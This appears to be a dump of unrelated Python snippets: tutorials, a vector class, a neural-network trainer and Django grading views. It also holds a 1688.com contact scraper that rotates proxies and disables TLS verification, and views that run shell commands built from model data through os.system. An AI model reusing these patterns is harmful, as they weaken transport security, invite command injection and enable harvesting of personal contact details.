text stringlengths 8 6.05M |
|---|
'''
- list type
  1. ordered
  2. can store values of several different types
  3. values can be modified
'''
a=[1,2,3]
b=[10, True, "문자열"]
c=[10,20,30]
d=a # copies the reference (id), not the list contents
print("a id:",id(a))
print("b id:",id(b))
print("c id:",id(c))
print("d id:",id(d))  # same id as a: both names refer to one list
print("a[0]:",a[0]) # read the value stored at a[0]
a[0] = 999; # modify the value at a[0]
print("a : ",a)
print("d : ",d)  # d shows the change too -- it is the same list object
family = ['엄마','아빠','나']
print('가족 구성원 목록:', family)
print('가족 구성원 수:', len(family))
# appending data to a list
family.append("남동생")
family.append("여동생")
print("데이터 추가 후 .... ")
print("가족 구성원 목록:", family)
print("가족 구성원 수:", len(family))
# removing data from a list
# removal by value
family.remove("남동생")
print("남동생 삭제 후 .... ")
print("가족 구성원 목록:", family)
# removal by index
del family[3]
print("여동생 삭제 후 .... ")
print("가족 구성원 목록:", family)
#
popedData = family.pop() # pop() returns the removed (last) element
print("pop() 후 .... ")
print("가족 구성원 목록:", family)
print("popedData:", popedData)
familyHistory = []
familyHistory.append(popedData)
print("familyHistory:", familyHistory)
# store member records in dict objects
mem1={'num':1, 'name':'김구라', 'addr':'노량진'}
mem2={'num':2, 'name':'해골', 'addr':'행신동'}
mem3={'num':3, 'name':'원숭이', 'addr':'상도동'}
print("mem1 의 name 이라는 키값으로 저장된 값 참조...")
print(mem1['name'])
# keep the dicts in a list
members = [mem1, mem2, mem3]
# reference the dict objects stored in the list
print(members[0])
print(members[1])
print(members[2])
# read the value stored under the 'addr' key of the dict
# held in slot 1 of members
dic1 = members[1]
result = dic1['addr']
print('result:', result)
result2 = members[1]['addr']
print('result2:', result2)
# modify a value through the referenced slot with the assignment operator
members[0]['name'] = '개구라'
print('개구라 수정후:', members)
print('개구라 수정후:', mem1)  # mem1 reflects the change: same dict object
numbers=[]
numbers.append(10)
numbers.append(40)
numbers.append(50)
numbers.append(20)
numbers.append(30)
print('numbers:',numbers)
# ascending in-place sort
numbers.sort()
print("정렬 후....")
print(numbers)
# descending sort
numbers.sort(reverse=True)
print("numbers 내림차순 정렬 후...")
print(numbers)
# slice practice
numbers2 = [1,2,3,4,5,6,7,8,9,10]
print(numbers2[0:2]) # index >= 0 and < 2
print(numbers2)
print(numbers2[-5:-1])
examData1 = {'num':1, 'name':'김구라', 'eng':100, 'math':80}
examData2 = {'num':2, 'name':'해골', 'eng':90, 'math':70}
examData3 = {'num':3, 'name':'원숭이', 'eng':80, 'math':100}
resultList = [examData1, examData2, examData3]
print(type(range(10)))
# loops
for i in range(10):
    print(i)
for i in range(len(resultList)):
    print(i)
'''
- print output in the following form:
번호:1 이름:김구라 영어:xx 수학:xx
번호:2 이름:해골 영어:xx 수학:xx
번호:3 이름:원숭이 영어:xx 수학:xx
'''
for i in range(len(resultList)):
    print("번호:{} 이름:{} 영어:{} 수학:{}".format(resultList[i]['num'],resultList[i]['name'],resultList[i]['eng'],resultList[i]['math']))
for i in range(len(resultList)):
    # get the dict holding the i-th member's data
    tmp = resultList[i]
    result = "번호:{} 이름:{} 영어:{} 수학:{}"\
        .format(tmp['num'],tmp['name'],tmp['eng'],tmp['math'])
    print(result)
for a in [10,20,30]:
    print(a)
# idiomatic: iterate over the list elements directly
for item in resultList:
    result = "번호:{} 이름:{} 영어:{} 수학:{}"\
        .format(item['num'],item['name'],item['eng'],item['math'])
    print(result)
import requests
from bs4 import BeautifulSoup
import time
import re
import random
import xlwt
import ssl
# Globally disable TLS certificate verification for HTTPS requests made via
# the ssl default context.  NOTE(review): insecure; acceptable only for
# throwaway scraping, never for production.
ssl._create_default_https_context = ssl._create_unverified_context
class Get_ip(object):
    '''
    Scrape a free-proxy listing page and collect HTTP proxy addresses.
    (Original docstring: "get ip info".)
    '''
    def __init__(self):
        super(Get_ip, self).__init__()
        self.url = 'http://www.kuaidaili.com/free/inha/'
        self.headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
            "Accept": "*/*",
            "Connection": "Keep-Alive"
        }
        self.session = requests.session()
    def run(self):
        '''
        Fetch the proxy list (original: "get ip proxies").
        :return: list of dicts {'ip': ..., 'port': ...} for HTTP-type rows
        '''
        html = self.session.get(self.url, headers=self.headers).text
        soup = BeautifulSoup(html, 'lxml')
        tableList = soup.select('#list > table')[0].find_all('tr')
        http_ips = []
        for tr in tableList[1:]:  # skip the table header row
            # NOTE(review): `type` shadows the builtin of the same name.
            type = tr.select('td')[3].get_text()
            ipDict = {'ip': '', 'port': ''}
            if type == 'HTTP':
                ip = tr.select('td')[0].get_text()
                port = tr.select('td')[1].get_text()
                ipDict['ip'] = ip
                ipDict['port'] = port
                http_ips.append(ipDict)
        print(http_ips)
        return http_ips
class Get_urls():
    '''
    Fetch one result page of the company search and collect the
    detail-page links from it (original: "crawl each page's urls").
    '''
    def __init__(self, url, page, ip):
        """
        :param url: base search url (without the beginPage parameter)
        :param page: page number to request
        :param ip: proxy dict with 'ip' and 'port' keys (from Get_ip.run())
        """
        self.page = page
        self.url = url
        self.proxies = {
            'http': 'http://' + ip['ip'] + ':' + ip['port']
        }
    def get_url(self):
        """Request the page through the proxy and return the list of
        company-detail hrefs found in the result listing."""
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
        }
        print(self.url + '&beginPage=' + str(self.page))
        html = requests.get(self.url + '&beginPage=' + str(self.page),headers=headers, proxies=self.proxies).text
        print(html)
        soup = BeautifulSoup(html,'lxml')
        # Fix: the original called .find('url'); 'url' is not an HTML tag,
        # so find() always returned None and the chained call crashed with
        # AttributeError.  The result listing lives in a <ul> element.
        table = soup.find('div', attrs={'id': 'sw_mod_mainblock'}).find('ul').find_all('div', attrs={'class': 'list-item-left'})
        urls = []
        for item in table:
            urls.append(item.find('a').get('href'))
        return urls
class Get_contact():
    '''
    Open a company page via the proxy and scrape the contact name and
    contact-info fields (original: "get phone and link info from the
    1688 wholesale site").
    '''
    def __init__(self, url, ip):
        """
        :param url: company detail-page url
        :param ip: proxy dict with 'ip' and 'port' keys
        """
        # Fix: the original built 'http://<ip><port>' without the ':'
        # separator (unlike Get_urls), producing an invalid proxy address.
        self.proxies = {
            'http': 'http://' + ip['ip'] + ':' + ip['port']
        }
        self.url = url
        self.headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
        }
        self.session = requests.session()
    def run(self):
        """Scrape the contact page.

        Side effects: sets ``self.statue`` (1 ok / 0 failed) and, on
        success, ``self.title`` (contact name) and ``self.infor`` (list of
        contact-info strings).
        """
        try:
            html = self.session.get(self.url, headers=self.headers, proxies=self.proxies, timeout=2).text
            contact_url = BeautifulSoup(html, 'lxml').find('div', attrs={'class': 'top-nav-bar-box'}).find('li', attrs={'data-page-name': 'contactinfo'}).find('a').get('href')
        except Exception:  # narrowed from a bare except
            self.statue = 0
            print('~~~')
            return
        self.statue = 1
        try:
            html = self.session.get(contact_url, headers=self.headers, proxies=self.proxies, timeout=2).text
            # Parse once and reuse (the original parsed the same html twice);
            # 'lxml' matches the parser used elsewhere in this module.
            soup = BeautifulSoup(html, 'lxml')
            table = soup.find('div', attrs={'class': 'fd-line'}).find_all('dl')
            self.title = soup.find('div', attrs={'class': 'contact-info'}).find('h4').get_text()
            self.infor = []
            for item in table[:-1]:
                # (removed a no-op .replace('', '') from the original)
                self.infor.append(item.get_text().replace('\n', ''))
        except Exception:
            self.statue = 0
class Main():
    '''
    Driver (original: "main function"): collect a proxy pool, crawl four
    search-result pages, and write the scraped contact info to an Excel
    workbook.
    '''
    def __init__(self):
        self.f = xlwt.Workbook()
        self.sheet = self.f.add_sheet('sheet')
        self.count = 0  # next free row index in the sheet
        work = Get_ip()
        self.ips = work.run()  # proxy pool shared by all requests
    def work(self):
        '''
        Example of a full search url:
        https://s.1688.com/company/company_search.htm?keywords=%BE%AB%C3%DC%BB%FA%D0%B5&earseDirect=false&button_click=top&n=y&pageSize=30&offset=3&beginPage=2
        '''
        search_url = 'https://s.1688.com/company/company_search.htm?keywords=%BE%AB%C3%DC%BB%FA%D0%B5&earseDirect=false&button_click=top&n=y&pageSize=30&offset=3'
        for i in range(4):  # pages 2..5
            # pick a random proxy from the pool for each request
            url_get = Get_urls(search_url, i + 2, self.ips[random.randint(0, len(self.ips) - 1)])
            try:
                urls = url_get.get_url()
            except:  # NOTE(review): bare except silently skips a whole page
                continue
            for url in urls:
                spider = Get_contact(url, self.ips[random.randint(0, len(self.ips) - 1)])
                spider.run()
                if spider.statue == 0:
                    continue  # scrape failed; skip this company
                self.sheet.write(self.count, 0, spider.title)
                num = 1
                for infor in spider.infor:
                    self.sheet.write(self.count, num, infor)
                    num += 1
                self.count+=1
                print(self.count)
        # Save once after all pages.  NOTE(review): original indentation was
        # lost; confirm the save was not intended per-row.
        self.f.save(r'F:\web项目\爬虫项目\1688\data.xls')
if __name__ == '__main__':
    # Entry point: build the scraper and run the full crawl.
    Main().work()
|
from math import hypot
class Vector:
    """2-D vector supporting +, -, scalar *, unary +/-, abs (magnitude),
    truthiness, equality and magnitude-based ordering (>, >=)."""

    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

    def __repr__(self):
        return 'Vector(%r, %r)' % (self.x, self.y)

    # str and repr intentionally share the same format.
    def __str__(self):
        return 'Vector(%r, %r)' % (self.x, self.y)

    def __pos__(self):
        return Vector(self.x, self.y)

    def __neg__(self):
        return Vector(-self.x, -self.y)

    def __abs__(self):
        # Euclidean magnitude.
        return hypot(self.x, self.y)

    def __bool__(self):
        # Fix: the original defined ``__bool_`` (missing trailing
        # underscore), so Python never called it and every Vector --
        # including the zero vector -- was truthy.  A vector is falsy
        # iff its magnitude is zero.
        return bool(abs(self))

    def __add__(self, otherVector):
        return Vector(self.x + otherVector.x, self.y + otherVector.y)

    def __sub__(self, otherVector):
        return Vector(self.x - otherVector.x, self.y - otherVector.y)

    def __mul__(self, scalar):
        return Vector(self.x * scalar, self.y * scalar)

    # Support scalar * vector as well as vector * scalar.
    __rmul__ = __mul__

    def __eq__(self, other):
        return (self.x == other.x) and (self.y == other.y)

    def __gt__(self, other):
        return abs(self) > abs(other)

    def __ge__(self, other):
        return abs(self) >= abs(other)
# Demo: exercise the Vector dunder protocol (str, abs, bool, +, *, rmul).
v1 = Vector(3, 4)
v2 = Vector(5, 12)
print("The first vector is", v1)
print("The second vector is", v2)
print("The size of the first vector is", abs(v1))
print("The size of the second vector is", abs(v2))
print("Is the first vector true?", bool(v1))
print("Is the second vector true?", bool(v2))
print("The sum of the vectors is", v1 + v2)
print("The first vector times 3 is", v1 * 3)
print("The second vector times 3 is", v2 * 3)
print("Three times the first vector is", 3 * v1)
print("Three times the second vector is", 3 * v2)
print("Three times the first vector times 3 is", 3 * v1 * 3)
print("Three times the second vector times 3 is", 3 * v2 * 3)
|
# Compute the calendar year in which the user can retire
# (age and years are in Turkish: yaş = age, yıl = year).
current_age = 35
retirement_age = 65
current_year = 2020
retirement_year = current_year + (retirement_age - current_age)
print(retirement_year)
print("yılında emekli olabilirsiniz")
|
#!/usr/bin/env python
import numpy as np
import numba
from numba import jit
"""
from cffi import FFI
ffi = FFI()
lib = ffi.dlopen('./test.so')
ffi.cdef('void w3j_ms(double, double, double, double);')
_w3j_ms = lib.___pyx_pw_4test_1w3j_ms
drc3jm = lib.drc3jm_
"""
from test import w3j_ms as _w3j_ms
@jit#(nopython=True)
def w3j_ms(l1, l2, l3, m1):
    """Numba-jitted wrapper around the compiled ``w3j_ms`` routine.

    For the given l1, l2, l3, m1 it returns the Wigner 3-j values for m2
    from -l2 to +l2 (per the original docstring); the computation itself
    lives in the compiled ``test`` extension module imported above.
    """
    return _w3j_ms(l1, l2, l3, m1)

# Smoke test -- presumably prints the array of 3-j values for (2,2,2,0);
# output depends on the external extension module.
print(w3j_ms(2,2,2,0))
|
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from urdf_parser_py.urdf import URDF
from pykdl_utils.kdl_kinematics import KDLKinematics
import numpy as np
from tf import transformations
class robot:
    """MoveIt/KDL wrapper for a 6-DOF manipulator: caches the current
    end-effector pose, joint values and Jacobian, and provides small
    kinematics helpers for a QP-based controller."""

    def __init__(self):
        moveit_commander.roscpp_initialize(sys.argv)
        rospy.init_node('qp_ros_interface',
                        anonymous=True)
        group_name = "manipulator"
        robot_commander = moveit_commander.RobotCommander()
        group = moveit_commander.MoveGroupCommander(group_name)
        self.robot_commander = robot_commander
        self.group = group
        # Cached end-effector pose, position and orientation quaternion.
        self.pose = self.group.get_current_pose().pose
        self.position = np.array([self.pose.position.x, self.pose.position.y, self.pose.position.z])
        self.quaternion = np.array([self.pose.orientation.x, self.pose.orientation.y, self.pose.orientation.z, self.pose.orientation.w])
        self.joint_status = self.group.get_current_joint_values()
        # Build a KDL chain from the URDF for Jacobian computation.
        robot = URDF.from_parameter_server()
        self.kdl_kin = KDLKinematics(robot, "base_link", "ee_link")
        self.jacobian = self.kdl_kin.jacobian(self.joint_status)

    def update_joint_status(self):
        """Refresh the cached joint values from MoveIt."""
        self.joint_status = self.group.get_current_joint_values()

    def update_jacobian(self):
        """Refresh the joint values and recompute the KDL Jacobian."""
        self.joint_status = self.group.get_current_joint_values()
        self.jacobian = self.kdl_kin.jacobian(self.joint_status)

    def update_pose(self):
        """Refresh the cached end-effector pose.

        NOTE(review): after this call ``position`` is a (3, 1) column and
        ``quaternion`` a tuple, whereas __init__ stored a flat (3,) array
        and an ndarray -- confirm all consumers accept both shapes.
        """
        self.pose = self.group.get_current_pose().pose
        self.position = np.array([[self.pose.position.x],
                                  [self.pose.position.y],
                                  [self.pose.position.z]])
        self.quaternion = (self.pose.orientation.x,
                           self.pose.orientation.y,
                           self.pose.orientation.z,
                           self.pose.orientation.w)

    def hat(self, x):
        """Return the 3x3 skew-symmetric (hat) matrix of 3-vector *x*."""
        x_hat = np.array([[0., -x[2], x[1]],
                          [x[2], 0., -x[0]],
                          [-x[1], x[0], 0.]])
        return x_hat

    def q2R(self, quaternion):
        """Return the 4x4 homogeneous rotation matrix for *quaternion*."""
        R = transformations.quaternion_matrix(quaternion)
        return R

    def cal_dJ_dq(self, Fs):
        """Finite-difference gradient of the singularity-avoidance cost
        Fs = -0.5 * det(J^T J) with respect to each of the 6 joints.

        :param Fs: cost value at the current joint configuration
        :return: (1, 6) numpy array of partial derivatives
        """
        dJ_dq = np.zeros((1, 6))
        dq = 0.05
        for i in range(6):
            # Fix: perturb a *copy* of the joint vector.  The original
            # aliased self.joint_status, so each iteration permanently
            # corrupted the cached joint values and the perturbations
            # accumulated across joints.
            joint_status_tmp = list(self.joint_status)
            joint_status_tmp[i] += dq
            jacobian_new = self.kdl_kin.jacobian(joint_status_tmp)
            Fs_new = -0.5*np.linalg.det(np.dot(jacobian_new.T, jacobian_new))
            dJ_dq[0,i] = (Fs_new - Fs)/dq
        return dJ_dq

    def update_states(self):
        """Refresh the Jacobian (which also refreshes the joint values)
        and the pose in one call."""
        # self.update_joint_status()  # redundant: done inside update_jacobian()
        self.update_jacobian()
        self.update_pose()
|
from random import randint
def get_number():
    """Get number from user.

    Prompts repeatedly until the input parses as an integer.

    :rtype: int
    :return: given number as int
    """
    while True:
        try:
            # Returning directly replaces the break/return dance.
            return int(input("Guess the number: "))
        except ValueError:
            print("It's not a number")
def guess_the_number():
    """Main function with our game."""
    secret = randint(1, 100)
    guess = get_number()
    while guess != secret:
        # Tell the player which direction to adjust, then re-prompt.
        print("Too small!" if guess < secret else "Too big!")
        guess = get_number()
    print("You Win!")
# Run the game only when executed as a script.
if __name__ == '__main__':
    guess_the_number()
|
class DataManager:
    """Placeholder for managing market data for a set of symbols."""

    def __init__(self, list_of_symbols=None):
        """Store the symbols this manager is responsible for.

        :param list_of_symbols: optional list of ticker symbols;
            defaults to an empty list.
        """
        # Fix: the original declared ``__self__`` (a typo for ``__init__``),
        # so the class had no working constructor and
        # ``DataManager(symbols)`` raised TypeError.
        self.list_of_symbols = list_of_symbols if list_of_symbols is not None else []
from collections import defaultdict
class Solution:
    def verticalTraversal(self, root: "TreeNode") -> "List[List[int]]":
        """Return the vertical-order traversal of a binary tree.

        Nodes are grouped by horizontal level (root = 0, left child -1,
        right child +1), groups ordered left to right; within a group
        nodes are ordered by depth, ties broken by value.

        Annotations are quoted because TreeNode/List are provided by the
        judge environment and not imported here (the original unquoted
        annotations would raise NameError at class-creation time).
        """
        order = defaultdict(list)

        def traverse(node, level, depth):
            # Record (depth, value) under the node's horizontal level,
            # then recurse into both subtrees.
            # Fix: the original had two stray trailing ``return``
            # statements which, depending on indentation, cut the
            # right-subtree recursion short.
            if node:
                order[level].append((depth, node.val))
                traverse(node.left, level - 1, depth + 1)
                traverse(node.right, level + 1, depth + 1)

        traverse(root, 0, 1)
        result = []
        # Sort groups by level, then each group's entries by (depth, value).
        for _, entries in sorted(order.items()):
            result.append([val for _, val in sorted(entries)])
        return result
import neuron as n
import numpy as np
class Network(object):
    """Feed-forward neural network with one hidden layer, trained with
    batch gradient descent; forward passes are delegated to
    ``neuron.neuron()`` from the project's ``neuron`` module."""

    def __init__(self, featureLength, noOfNeuronsL1, noOfNeuronsL2, eta):
        """
        :param featureLength: count of nodes in the input layer
        :param noOfNeuronsL1: count of nodes in the hidden layer
        :param noOfNeuronsL2: count of nodes in the output layer
        :param eta: learning rate
        """
        # NOTE(review): pow(x, -.005) gives near-unit std-dev; the usual
        # Xavier-style init would be pow(x, -0.5) -- confirm the exponent.
        self.weights1=np.random.normal(0.0,pow(featureLength,-.005),(featureLength,noOfNeuronsL1))
        self.weights2 = np.random.normal(0.0, pow(noOfNeuronsL1+1, -.005), (noOfNeuronsL1+1, noOfNeuronsL2))
        self.eta= eta

    def trainNetwork(self,trainData,trainLabels,validationData,validationLabels):
        '''
        Train for 100 epochs of batch gradient descent, tracking
        validation/train accuracy each epoch and writing them to sol.txt.

        @args
        trainData: training data in numpy format
        trainLabels: train data labels in numpy format
        validationData: validation data in numpy format
        validationLabels: in numpy format
        '''
        self.bias = np.random.rand(len(trainData), 1)
        lis1 = []  # validation accuracy per epoch
        lis2 = []  # training accuracy per epoch
        for i in range(0,100):
            # forward pass: hidden layer (tanh) + appended bias column,
            # then output layer (sigmoid)
            z1= n.neuron(self.weights1,trainData,"tanh")
            z1 = np.column_stack((z1,self.bias))
            z2 = n.neuron(self.weights2,z1,"sigmoid")
            ###### batch gradient descent
            diff = (z2-trainLabels)
            delta2 = np.dot(z1.transpose(),diff) # gradient of loss function w.r.t to ouput layer weights
            self.weights2 = self.weights2 - self.eta*delta2 #output layer weight updates
            temp1 =np.dot(diff,self.weights2.transpose())
            # tanh'(x) = 1 - tanh(x)^2 applied elementwise to z1
            temp2 = np.multiply(temp1,(1-np.multiply(z1,z1)))
            delta1 = np.dot(trainData.transpose(),temp2) #gradient of loss function w.r.t to hidden layer weights
            # NOTE(review): the 0:300 slice drops the bias column's gradient
            # and hard-codes the hidden width -- confirm noOfNeuronsL1 == 300.
            self.weights1 = self.weights1 - self.eta*delta1[:,0:300] # hidden layer weight update
            labels = self.testNetwork(validationData)
            labelsTrain = self.testNetwork(trainData)
            k = self.accuracy(labels, validationLabels)
            p = self.accuracy(labelsTrain, trainLabels)
            lis1.append(k)
            lis2.append(p)
        self.writetofile(lis1, lis2)

    #function to test the model
    def testNetwork(self,testData):
        """Forward-pass *testData* through the trained network and return
        the output-layer activations."""
        z1 = n.neuron(self.weights1, testData, "tanh")
        bias = np.ones((len(z1), 1))
        z1 = np.column_stack((z1, bias))
        z2 = n.neuron(self.weights2, z1, "sigmoid")
        return z2

    def accuracy(self, predictedLabels, validationLabels):
        """Fraction of rows whose argmax matches the label row's argmax
        (assumes one-hot label rows -- TODO confirm)."""
        cnt = 0
        for i in range(len(predictedLabels)):
            if np.argmax(predictedLabels[i]) == np.argmax(validationLabels[i]):
                cnt = cnt + 1
        return float(cnt) / float(len(validationLabels))

    def writetofile(self, val, train):
        """Write per-epoch "val,train" accuracy pairs to sol.txt.

        NOTE(review): no separator is written between pairs, so all 100
        epochs end up concatenated on one line -- confirm intent.
        """
        f = open("sol.txt", 'w')
        for i in range(len(val)):
            f.write(str(val[i]) + "," + str(train[i]))
        f.close()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 9 10:23:54 2020

@author: Alex
"""
import numpy as np
import matplotlib.pyplot as plt
#import the simulated annealing methods and the 3 dimensional NLL function
from Annealing import Main
from Analysis_Methods import NLL_2

#apply the sim annealing method and calculate the parameter chain
chain = Main(NLL_2)
#caculate the steps for plotting
steps = np.arange(len(chain))
#format graphs
plt.figure(figsize=(10,6))
plt.rc('xtick', labelsize=15)
plt.rc('ytick', labelsize=15)
plt.rc('figure', titlesize=45)
plt.rc('axes', titlesize=20) # fontsize of the axes title
plt.rc('axes', labelsize=20)
plt.rc('legend', fontsize=22)
#plot the variation of each parameter as a function of step
# Fix: the original plotted an undefined name ``ParamChain`` (NameError);
# the chain returned by Main() is bound to ``chain`` above.
plt.plot(steps, chain[:, 0], 'r-')
plt.plot(steps, chain[:, 1], 'b-')
plt.plot(steps, chain[:, 2], 'g-')
plt.grid()
plt.xlabel("No. of Steps")
plt.ylabel("Parameter Value")
plt.legend(["θ","Δm", "α"])
plt.show()
#plot the variation of system temperature as a function of step
temps = np.arange(0, 15, 0.1)
temps = 10*np.exp(-temps)
steps = np.arange(0, 1.5e6, 10000) + 5000
plt.figure(figsize=(10,6))
plt.rc('xtick', labelsize=15)
plt.rc('ytick', labelsize=15)
plt.rc('figure', titlesize=45)
plt.rc('axes', titlesize=20) # fontsize of the axes title
plt.rc('axes', labelsize=20)
plt.rc('legend', fontsize=22)
plt.plot(steps, temps, 'r-')
plt.grid()
plt.xlabel("No. of Steps")
plt.ylabel("Temperature")
plt.show()
# Fix: removed a stray pasted REPL output line ("array([...])") that
# raised NameError at import time.
|
# Implement Naïve Bayes method using scikit-learn library
# Use train_test_split to create training and testing part
# Evaluate the model on test part

# importing libraries
from sklearn.naive_bayes import GaussianNB
import pandas as pds
from sklearn.metrics import accuracy_score
from sklearn import metrics
from sklearn.model_selection import train_test_split

# fetching the data from glass.csv file
train_df = pds.read_csv('glass.csv')
X_train_drop = train_df.drop("Type", axis=1)
Y_train = train_df["Type"]

# creating training and testing part from train_test_split function
X_train, X_test, y_train, y_test = train_test_split(X_train_drop, Y_train, test_size=0.25)

# calling the naive bayes classifier model and training the model with the train sets using the fit method
NBModel = GaussianNB()
# Fix: the model was fitted on the *test* split (X_test, y_test), which
# leaks the evaluation data and ignores the training set entirely.
NBModel.fit(X_train, y_train)

# predicting test data using predict function
predict = NBModel.predict(X_test)

# evaluating the model by calculating the accuracy score
# Fix: the accuracy value was computed but discarded; print it.
print("accuracy:", accuracy_score(y_test, predict))
print("\nclassification_report :\n", metrics.classification_report(y_test, predict) )
def gcd(a, b):
    """Return the greatest common divisor of *a* and *b*.

    Uses Euclid's algorithm: O(log(min(a, b))) instead of the original
    O(min(a, b)) downward trial-division loop, which also returned None
    when min(a, b) == 0.
    """
    while b:
        a, b = b, a % b
    return a
def lcm(a, b):
    """Return the least common multiple of positive integers *a* and *b*.

    Fix: uses floor division (//) so the result stays an int; the
    original ``/`` produced a float under Python 3.
    """
    from math import gcd as _gcd  # local import keeps this block standalone
    return a * b // _gcd(a, b)
# Ported from Python 2: raw_input -> input, and the map() result is
# materialised to a list so it can be indexed/sliced under Python 3.
num_tests = int(input())
for test_index in range(num_tests):
    num_sensors = int(input())
    sensor_intervals = list(map(int, input().split()))
    min_lcm = -1
    # Smallest LCM over all unordered pairs of sensor intervals.
    for sensor_index_a in range(num_sensors - 1):
        interval_a = sensor_intervals[sensor_index_a]
        for interval_b in sensor_intervals[sensor_index_a + 1:]:
            lcm_ab = lcm(interval_a, interval_b)
            if min_lcm == -1 or lcm_ab < min_lcm:
                min_lcm = lcm_ab
    print(min_lcm)
|
import pydot
import os
# Make the Graphviz binaries reachable for pydot's rendering step.
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz/bin/'
rootDir = "project/ceo"
a=["skyblue","yellow"]  # alternating fill colours for directory nodes
x=0                     # index into the colour list
G = pydot.Dot(graph_type="digraph")
# Root node named after the last path component, coloured green.
node = pydot.Node(rootDir.split('/')[-1], style="filled", fillcolor="green")
G.add_node(node)
for root , dirs ,files in os.walk(rootDir):
    print(dirs)
    # Keep only the last Windows path component.  NOTE(review): the
    # literal is '\\' followed by an empty '' (implicit concatenation) --
    # presumably just a backslash split; confirm.
    root=root.split('\\''')[-1]
    for subdir in dirs:
        node = pydot.Node(subdir, style="filled", fillcolor=a[x])
        G.add_node(node)
        # Edge from the parent directory to each subdirectory.
        edge = pydot.Edge(root.split('/')[-1], subdir)
        G.add_edge(edge)
        print (a[x])
        # Cycle through the two colours.
        x=x+1
        if(x>1):
            x=0
    print (root)
G.write_png('example1_graph.png')
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 24 11:23:03 2018
@author: HP
"""
#"python is good" ">" "good is python"
#def reverse(s):
# return " ".join(reversed(s.split()))
#s = "python is good"
#print(reverse(s))
#def revers(s):
# s = s.split()
# s.reverse()
# return s
#s = "hi hello how are you"
#print(revers(s))
def rever(s):
    """Reverse the order of the words in *s*, keeping each word intact.

    Note: joining the reversed word list differs from reversing the
    joined string, which would also reverse the letters.
    """
    words = s.split()
    return " ".join(reversed(words))
s = "hi hello"
print(rever(s))
|
# -*- coding: utf-8 -*-
from django.shortcuts import get_object_or_404, render_to_response
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.conf import settings
from Teste.models import TesteQuestao, Fontes
#-----------------------AJAX----------------------
from django.core import serializers
from django.http import HttpResponse
#from django.shortcuts import render_to_response
#from DjangoAjax.contatos.models import Contatos
from Teste.models import Contatos
#-----------------------AJAX----------------------
def index(request):
    """Render the AJAX test page."""
    return render_to_response('Teste/testeAjax.html',)
def get_contatos(request):
    """Return every Contatos record serialized as JSON (AJAX endpoint)."""
    contatos = Contatos.objects.all()
    retorno = serializers.serialize("json", contatos)
    # Fix: HttpResponse's ``mimetype`` keyword was removed in Django 1.7;
    # ``content_type`` is the long-supported equivalent.
    return HttpResponse(retorno, content_type="text/javascript")
def xhr_test(request):
    """Reply "Hello AJAX" for XMLHttpRequest calls, plain "Hello" otherwise."""
    message = "Hello AJAX" if request.is_ajax() else "Hello"
    return HttpResponse(message)
#import commands
import os
def compilar(questao,user):
    """Compile the sources of *questao* with its generated makefile.

    Returns the ``os.system`` exit status of the ``make`` run (0 = ok).

    NOTE(review): the command is built from model data and run through the
    shell -- confirm those values are trusted.
    """
    # Create the per-user folder under MEDIA_ROOT/execs if it is missing.
    if not os.path.exists(settings.MEDIA_ROOT + """execs/"""+user.username):
        os.makedirs (settings.MEDIA_ROOT + """execs/"""+user.username)
    # Path to the dynamically generated makefile for the question's sources.
    pathMkFile = os.path.join(settings.MEDIA_ROOT,"fontes",str(questao.user.username),"makefile")
    # (disabled) generate the makefile for the sources
    #questao.gerar_makefile()
    # Compile using the sources' makefile.
    command = "make -f " + pathMkFile
    #output = commands.getoutput(command)
    output = os.system(command)
    # After compiling, clean up the generated .o files.
    os.system("make clean -f " + pathMkFile)
    return output
@login_required
def testeCompilacao(request,questao_id):
    """View: compile the question's sources and render the result page."""
    user = request.user
    questao = get_object_or_404(TesteQuestao,pk=questao_id)
    ret = compilar(questao,user)
    return render_to_response('Teste/testeCompilacao.html', locals(),context_instance=RequestContext(request))
def rodar(questao,user):
    """Run the compiled executable of *questao*, feeding it the question's
    input file and redirecting stdout to MEDIA_ROOT/saida/<user>/<titulo>.

    Returns the ``os.system`` exit status.

    NOTE(review): shell command assembled from model data -- confirm
    these values are trusted.
    """
    # Create the per-user execs folder if it is missing.
    if not os.path.exists(settings.MEDIA_ROOT + """execs/"""+user.username):
        os.makedirs (settings.MEDIA_ROOT + """execs/"""+user.username)
    # Create the per-user saida (output) folder if it is missing.
    if not os.path.exists(settings.MEDIA_ROOT + """saida/"""+user.username):
        os.makedirs (settings.MEDIA_ROOT + """saida/"""+user.username)
    command = settings.MEDIA_ROOT + """execs/"""+user.username+"""/"""+ questao.titulo
    command += " < "+ settings.MEDIA_ROOT + questao.entrada.__str__() +""" > """ + settings.MEDIA_ROOT + """saida/"""+user.username+"""/"""+questao.titulo
    #output = """"""+settings.MEDIA_ROOT
    #output = commands.getoutput(command)
    output = os.system(command)
    return output
@login_required
def testeRodar(request, questao_id):
    """View: run the question's executable and render the result page."""
    user = request.user
    questao = get_object_or_404(TesteQuestao,pk=questao_id)
    ret = rodar(questao,user)
    return render_to_response('Teste/testeRodar.html', locals(),context_instance=RequestContext(request))
def comparar(questao,user):
    """Diff the user's program output against the reference output in
    MEDIA_ROOT/saidaRef/<titulo>.  Returns the ``diff`` exit status
    (0 means the outputs are identical).
    """
    # Create the per-user saida folder if it is missing.
    if not os.path.exists(settings.MEDIA_ROOT + """saida/"""+user.username):
        os.makedirs (settings.MEDIA_ROOT + """saida/"""+user.username)
    command ="""diff """ + settings.MEDIA_ROOT + """saida/"""+user.username+"""/"""+ questao.titulo +""" """ + settings.MEDIA_ROOT + """saidaRef/"""+questao.titulo
    #output = """"""+settings.MEDIA_ROOT
    #output = commands.getoutput(command)
    output = os.system(command)
    return output
@login_required
def testeComparacao(request, questao_id):
    """View: compare program output with the reference and render result."""
    user = request.user
